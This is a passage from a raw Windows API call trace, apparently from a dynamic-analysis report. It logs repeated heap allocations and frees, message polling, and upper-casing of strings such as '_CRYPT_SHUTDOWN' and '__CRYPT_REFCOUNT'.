(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e521b0 [0267.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52060 [0267.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552a8 [0267.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52060 | out: hHeap=0x970000) returned 1 [0267.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0267.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e521b0 | out: hHeap=0x970000) returned 1 [0267.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ee0 [0267.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520c0 [0267.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52120 [0267.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551e8 [0267.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52120 | out: hHeap=0x970000) returned 1 [0267.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0267.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520c0 | out: hHeap=0x970000) returned 1 [0267.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0267.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0267.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55258 | out: hHeap=0x970000) returned 1 [0267.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0267.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0267.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0267.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55198 | out: hHeap=0x970000) returned 1 [0267.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0267.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0267.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0267.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0267.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0267.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0267.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0267.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0267.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0267.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0267.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0267.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0267.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0267.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0267.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0267.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0267.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0267.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0267.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0267.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0267.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0267.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0267.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0267.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0267.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0267.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0267.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0267.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0267.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0267.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0267.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0267.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0267.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0267.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e565e8 | out: hHeap=0x970000) returned 1 [0267.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0267.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0267.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0267.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0267.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0267.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0267.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0267.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0267.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0267.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0267.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55118 | out: hHeap=0x970000) returned 1 [0267.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14038 | out: hHeap=0x970000) returned 1 [0267.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f153a0 [0267.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f155c8 | out: hHeap=0x970000) returned 1 [0267.043] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551f8 [0267.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55308 [0267.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55208 [0267.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0267.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55288 [0267.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55288 | out: hHeap=0x970000) returned 1 [0267.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0267.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0267.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55308 | out: hHeap=0x970000) returned 1 [0267.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0267.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0267.043] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0267.043] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55178 [0267.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0267.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0267.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0267.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0267.044] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0267.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0267.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0267.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0267.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0267.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0267.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0267.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0267.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0267.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0267.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0267.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0267.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0267.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf690) returned 0xe5f6e0 [0267.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0267.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0267.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0267.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0267.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0267.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0267.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0267.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0267.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0267.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0267.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0267.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0267.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf690) returned 0xe6ed78 [0267.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe5f6e0 | out: hHeap=0x970000) returned 1 [0267.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0267.049] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0267.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0267.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0267.049] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0267.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0267.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0267.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0267.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0267.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0267.049] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0267.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0267.049] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0267.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0267.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0267.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b80 [0267.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0267.049] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0267.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0267.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0267.050] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0267.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0267.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0267.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b98 [0267.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0267.050] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0267.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0267.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0267.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0267.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0267.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0267.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0267.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0267.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0267.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0267.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51bb0 [0267.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0267.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a00 [0267.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518f8 [0267.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51aa8 [0267.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0267.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0267.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51928 [0267.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a30 [0267.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a18 [0267.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0267.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0267.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0267.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0267.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0267.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0267.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0267.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0267.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0267.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0267.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0267.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0267.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0267.051] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0267.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0267.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0267.051] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0267.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0267.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0267.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0267.051] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0267.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0267.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0267.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518f8 [0267.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0267.051] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0267.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0267.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0267.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0267.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0267.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0267.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0267.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0267.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0267.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0267.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0267.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0267.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0267.052] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0267.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0267.052] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0267.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0267.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0267.052] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0267.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0267.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0267.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0267.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0267.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0267.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0267.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0267.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0267.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0267.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0267.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf690) returned 0xe5f6e0 [0267.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0267.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0267.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf690) returned 0xe7e410 [0267.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0267.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0267.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe5f6e0 | out: hHeap=0x970000) returned 1 [0267.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0267.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0267.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0267.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0267.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0267.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf690) returned 0xe5f6e0 [0267.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe7e410 | out: hHeap=0x970000) returned 1 [0267.057] HeapFree (in: 